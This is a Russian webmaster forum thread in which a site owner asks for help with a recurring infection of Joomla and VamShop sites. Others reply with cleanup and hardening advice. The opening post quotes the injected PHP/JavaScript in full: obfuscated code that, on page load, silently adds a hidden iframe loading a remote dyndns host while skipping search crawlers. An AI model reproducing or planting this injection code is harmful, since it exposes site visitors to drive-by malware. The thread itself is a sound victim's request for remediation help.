Поймал вирус, помогите пожалуйста!

(Ответов: 12, Просмотров: 3698)
Страница 1 из 2 12 Последняя
  1. Гуру Аватар для Vmir
    • Webmoney BL: ?
    Доброго времени суток многоуважаемые форумчане. Словил вирус, прошу помощи в решении вопроса.

В данный момент на хостинге 5 сайтов ( 1 – vamshop, остальные на Joomla 1.5 и 2.5)

Как я понимаю работает робот, так как я делал бэки файлов, но код продолжает генерироваться после какого то времени.

Насколько я понял из накопанной информации и последующей проверки вредоносный код генерируется в 2 файла - в корне index.php, а так же в файл administrator/index/php, со следующим содержимым:

код

<?php
    /*Proccessing Zend Optimization ver 1.0.0.1*/
    ob_start();

echo "<script type=\"text/javascript\">
    function sd5135GHEDF(agaga31323l) {
    var melm = document.getElementById(\"a35fdsfdsf62FFSSD\");
    if (typeof(melm) != \"undefined\" && melm!= null)
    {}else{
    var dsdSSSWrw515312FFF = document.createElement(\"iframe\");
    dsdSSSWrw515312FFF.id = \"a35fdsfdsf62FFSSD\";
    dsdSSSWrw515312FFF.style.width = \"10px\";
    dsdSSSWrw515312FFF.style.height = \"10px\";
    dsdSSSWrw515312FFF.style.border = \"0px\";
    dsdSSSWrw515312FFF.frameBorder = \"0\";
    dsdSSSWrw515312FFF.style.position = \"absolute\";
    dsdSSSWrw515312FFF.style.left = \"-200\";
    dsdSSSWrw515312FFF.setAttribute(\"frameBorder\", \"0\");
    document.body.appendChild(dsdSSSWrw515312FFF);
    dsdSSSWrw515312FFF.src = agaga31323l;
    return true;
    }
    }
    function asd61234tkhjasd454hfhf235(){
    sd5135GHEDF(\"http://paleciru.dyndns-web.com/eqxa.cgi?default\");
    }
    function SFWR64362fdhHHHHH(){
    if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){
    }else{
    asd61234tkhjasd454hfhf235();
    }
    if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i)!==null){
    try{
    //setTimeout(function(){window.location=\"http://paleciru.dyndns-web.com/vaih.cgi?2\";},1000);
    }
    catch(err) {
    //window.location=\"http://paleciru.dyndns-web.com/vaih.cgi?2\";location.href=\"http://paleciru.dyndns-web.com/vaih.cgi?2\";
    }
    }
    }
    try {
    if(window.attachEvent) {
    window.attachEvent(\"onload\", SFWR64362fdhHHHHH);
    } else {
    if(window.onload) {
    var curronload = window.onload;
    var newonload = function() {
    curronload();
    SFWR64362fdhHHHHH();
    };
    window.onload = newonload;
    } else {
    window.onload = SFWR64362fdhHHHHH;
    }
    }
    } catch(err) {}
    </script>";

/*Proccessing Zend Optimization ver 1.0.0.1*/
    ?>
    [свернуть]

Так же при новой генерации этого кода меняются права на файлы, я ставил 444, а обнаруживаю 644 .
    • 0
  2. Разработка любых сайтов Аватар для ArhStrAngeR
    • Записей в дневнике: 1
    Vmir, пакуете сайты на сервере, скачиваете себе. На сервере все зачищаете, предварительно прогнав антивирусом для пущей безопасности и для того, чтобы приметить новые места, на которые он ругнется. Затем зачищаете все подчистую и меняете данные доступа.

Затем в той копии, которую скачали - вычищаете вирусы, прогоняете антивирусами на локалхосте и заливаете на сервер.

Естественно данные доступа к сайтам, фтп и хостингу сменить обязательно. Так же проверить секретные вопросы на почте, чтобы были достаточно сложными.
    Если вирус появился опять - повторять до исчезновения. Скорее всего пропустили какое-то одно место, откуда он себя и распространил.
    • 0
  3. Опытный Аватар для Gunkin
    А что Яндекс Вебмастер говорит? Похоже на мобильный редирект, *.js проверяли?
    Можно адреса сайтов в личку.
    • 0
  4. Дипломник
    1.Сначала скачай резервную копию на сайт. Прогани антивирусом, советовал бы касперского....это единственный антивирус, который мне помог реально.

2.Далее посмотри Dr.Web CureIt!

3.Потом открой index файл найди шифр закодированный в base64 Обычно он в начале или в конце, в редких случаях он в середине. Берешь total comander и ищи во всех файлах этот кодированный кусок.

4. Посмотри любой .js там такой же должен быть зашифрованный base64.

5. Посмотри папки с картинками, иногда вирусня добавляется в качестве картинки. Найдешь битую, удаляй.

6. Закрывайте ftp доступ на хостинге + если надо большое кол-во фоток загрузить или еще чего-нибудь открывайте,но только на то время пока заливайте и не пользуйтесь filezila крякнутыми, лучше total commanderom....пишут, что через зилу чаще всего заражают . (Вирус заноситься как и на компе через файловую систему по ftp-менеджеру.....редиректы и всякий хлам)

7. Ставишь
    -а. jsecure authentication
    -б. Admin tools
    Они делают все что нужно.
    а)Скрывает прямой адрес /administrator, на какой-нибудь с ключом Пр:/administrator?12345. Блокирует IP
    б)Изменяет префикс таблицы,и меняет пользователя.

8. Паролиш папку с админкой, через htpasswd.

9. Закрываешь доступ через htaccess по ip адресу. И оставляешь только свой ip.

Вот наверно краткий мануал, для тех у кого в дальнейшем может развиться паранойя для безопасности от хаков. Если будет интересно , могу скинуть в личку список самых распространенных вирусов, которые я сам нашел просмотрев 1000 php скриптов, когда у меня была аналогичная проблема. Либо, если получу много плюсиков, могу скинуть сюда этот список))))))))))
    • 0
  5. Студент Аватар для Ymacker
    Всегда лечение сайта стоит начинать с просмотра логов. Можно до потери пульса менять права на папки и каждый день обнаруживать, что всё вернулось на круги своя. Хороший бэкдор - это пара строчек кода, пока не найдёшь его чёрный ход, излечить будет сложно.
    Места включений стороннего кода, зачастую можно увидеть хромом. Но опять же повторюсь, надо лечить болезнь, а не проявления. Менять права на папки, пароли на админки и панели стоит менять, когда найдёшь точку входа: запароленная панелька шела, бэкдор
    P.S. удачи
    весь в белом, по самые уши
    • 0
  6. Опытный Аватар для Gunkin
    В последнее время встречал проблемы именно на серверах хостера, файлы пользователей тут не при чем. После вмешательства службы поддержки проблемы решались, а танцы с бубном пользователей хостинга ни к чему не приводили - код появлялся заново через несколько дней.
    • 0
  7. Опытный Аватар для altry1st
    Тоже столкнулся с данной проблемой. Вирус заражает ВСЕ сайты на джумле на акк. Вроде вылечишь их бэкапом, сменишь пароли - через некоторое время опять все сайты заражены. Короче ппц какой-то...
    отличный хостинг для белых проектов: beget
    • 0
  8. Гуру Аватар для Vmir
    Большое спасибо всем, кто откликнулся!

Пробую разные схемы для решения вопроса. Как только пойму, что вируса больше нет, обязательно отпишусь.
    • 0
  9. Гуру Аватар для 3s777
    altry1st, у меня так целая история была с подобной проблемой. Тут описывал
    • 1

Спасибо сказали:

altry1st(28.01.2014),
  10. Опытный Аватар для altry1st
    Цитата Сообщение от 3s777 Посмотреть сообщение
    altry1st, у меня так целая история была с подобной проблемой. Тут описывал
    Я хостеру тоже отписался, он прогнал все сайты айболитом (ai-bolit), в итоге обнаружено куча шелов и сигнатур вирусов. Хостер перекидывает стрелки, что бы обращался к специалистам с решением. Не знаю, попробую скачать файлы к себе, пролечить антивирусами на локалке, дальше видно будет. Но это попандос конечно, кучу времени сжирает.

P.S. они обещают (хостинг) в ближайшее время ввести разделение сайтов в пределах одного акк, что бы не было такого, что заражаются сразу все...
    отличный хостинг для белых проектов: beget
    • 0
Страница 1 из 2 12 Последняя